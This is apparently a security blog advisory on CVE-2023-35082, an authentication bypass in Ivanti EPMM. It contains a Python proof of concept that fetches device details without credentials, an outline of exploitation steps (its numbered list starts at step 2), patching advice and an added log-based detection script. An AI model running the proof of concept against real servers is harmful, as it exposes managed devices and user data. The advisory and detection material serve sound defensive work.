In July 2023, a critical vulnerability was uncovered in Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core. Tracked as CVE-2023-35082, this flaw allows malicious actors to bypass authentication controls and gain unauthorized access to sensitive resources on targeted systems. If you’re running Ivanti EPMM 11.10 _or older_, your environment might be exposed even _if you patched_ for vulnerabilities earlier this year like CVE-2023-35078. Let’s break down what makes CVE-2023-35082 unique, explore how it’s exploited, and look at ways you can protect your infrastructure.

What Is CVE-2023-35082?

CVE-2023-35082 is an authentication bypass vulnerability that affects Ivanti EPMM (versions 11.10 and below). Essentially, it lets a remote user access restricted sections of the application’s API without needing to log in or provide valid credentials.

- Bypass is easy to script – no special tools needed.
- Patch is critical – even if you fixed earlier issues (CVE-2023-35078), you’re likely still at risk.

How Does CVE-2023-35082 Work?

This vulnerability lives in a part of the EPMM REST API. Normally, when you hit most EPMM API endpoints (for device data, configuration, etc.), you must be authenticated.

With CVE-2023-35082, attackers can construct queries that bypass authentication checks simply by targeting certain endpoints. This happens due to improper validation in how EPMM checks authorization: it doesn't properly enforce authentication for some old, “legacy” API routes.

Critical detail:
This vulnerability is _not_ a rehash of CVE-2023-35078. Systems already patched for CVE-2023-35078 can still be open to CVE-2023-35082.

Proof of Concept Code (PoC)

Below is a simplified Python example showing how an attacker might exploit this bug. This snippet retrieves sensitive device info from a vulnerable server (replace EPMM_SERVER and DEVICE_ID):

```python
import requests

EPMM_SERVER = 'https://victim-epmm.example.com'
DEVICE_ID = '12345'

# This endpoint should require authentication, but doesn't
URL = f'{EPMM_SERVER}/mifs/aad/api/v2/device/{DEVICE_ID}/details'

resp = requests.get(URL, verify=False)
if resp.status_code == 200:
    print("Sensitive Device Info Retrieved:")
    print(resp.text)
else:
    print("Exploit failed! Server returned:", resp.status_code)
```

What’s going on?
The /mifs/aad/api/v2/device/{DEVICE_ID}/details endpoint responds with protected device data, even though no auth headers or session are used.

Exploit Details

Security researchers at Volexity and NIST’s official CVE entry both highlight that attackers can enumerate device IDs and query device records, user data, and more, all from the internet with no login required.

2. Probe for accessible endpoints with unauthenticated requests (like the PoC above).

3. Harvest device/user data or push malicious configurations.
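
The enumeration pattern described above leaves a recognisable trace in web access logs: one outside source making many successful requests for different device IDs. The following is an added detection example, not code from the original post or from Ivanti. It assumes Apache common/combined log format and uses the endpoint prefix from the PoC on this page; the trusted network range, the threshold and the sample log lines are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import unquote

SUSPECT_PREFIX = "/mifs/aad/api/v2/"   # prefix taken from the PoC on this page
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # hypothetical admin/VPN range
# Assumption: Apache common/combined log format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
DEVICE_RE = re.compile(r"/device/([^/?]+)")

def find_suspect_requests(lines, enum_threshold=3):
    """Summarise successful hits on SUSPECT_PREFIX from untrusted sources, per IP."""
    report = defaultdict(lambda: {"hits": 0, "devices": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # malformed or non-matching line
        src, raw_path, status = m.groups()
        path = unquote(raw_path).lower()  # normalise %-encoding and case (conservative)
        if not path.startswith(SUSPECT_PREFIX) or not status.startswith("2"):
            continue                      # other routes, or request was rejected
        try:
            if any(ipaddress.ip_address(src) in net for net in TRUSTED_NETS):
                continue                  # expected management traffic
        except ValueError:
            pass                          # hostname in log: treat as untrusted
        entry = report[src]
        entry["hits"] += 1
        dev = DEVICE_RE.search(path)
        if dev:
            entry["devices"].add(dev.group(1))
    for entry in report.values():         # many distinct IDs from one source = enumeration
        entry["enumerating"] = len(entry["devices"]) >= enum_threshold
    return dict(report)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2023:10:00:01 +0000] "GET /mifs/aad/api/v2/device/1001/details HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Aug/2023:10:00:02 +0000] "GET /mifs/aad/api/v2/device/1002/details HTTP/1.1" 200 498',
    '203.0.113.7 - - [01/Aug/2023:10:00:03 +0000] "GET /mifs/aad/api/v2/device/1003/details HTTP/1.1" 200 530',
    '198.51.100.4 - - [01/Aug/2023:10:05:00 +0000] "GET /mifs/aad/api/v2/device/1001/details HTTP/1.1" 401 0',
    '10.1.2.3 - - [01/Aug/2023:10:06:00 +0000] "GET /mifs/aad/api/v2/device/1001/details HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Aug/2023:10:07:00 +0000] "GET /MIFS/aad/api/v2/device/2001/details HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, info in find_suspect_requests(SAMPLE_LOG).items():
        print(ip, info["hits"], sorted(info["devices"]), info["enumerating"])
```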

How Is This Different from CVE-2023-35078?

While CVE-2023-35078 also targeted REST API flaws, fixes for it do not fix CVE-2023-35082. The new bug involves other endpoints and distinct flawed logic in access control. Attackers are using this to bypass patches and get back in.

Are You At Risk?

If you’re running Ivanti EPMM/Core 11.10 or below and have _not_ applied the latest security updates from Ivanti, your system is likely vulnerable.

Check your version:

- Log in to the admin UI and verify your EPMM version
- Check your patch management history for July/August 2023 updates

What to do

- Update EPMM/Core immediately to protected versions as per Ivanti’s advisory.
- Limit network exposure: Don’t let EPMM management interfaces be accessible from the open internet—VPN or restricted IPs only.

References – Learn More

- NIST NVD: CVE-2023-35082
- Volexity Blog: Ivanti EPMM Zero-Days
- Ivanti Security Advisory: CVE-2023-35078 & CVE-2023-35082
- PoC Exploit on GitHub (community, use responsibly)

Final Thoughts

CVE-2023-35082 is a classic example of how legacy code and overlooked API endpoints can punch holes in even mature security products. Left unpatched, it puts all EPMM-managed devices and corporate data at immediate risk.
Patch now, restrict access, and keep a close eye on exposed APIs. Attackers are already exploiting this in the wild—don’t wait until it’s too late.


_Disclaimer: All code here is for educational purposes only. Don’t attack systems you don’t own or have permission to test!_

Timeline

Published on: 08/15/2023 16:15:00 UTC
Last modified on: 08/22/2023 02:16:00 UTC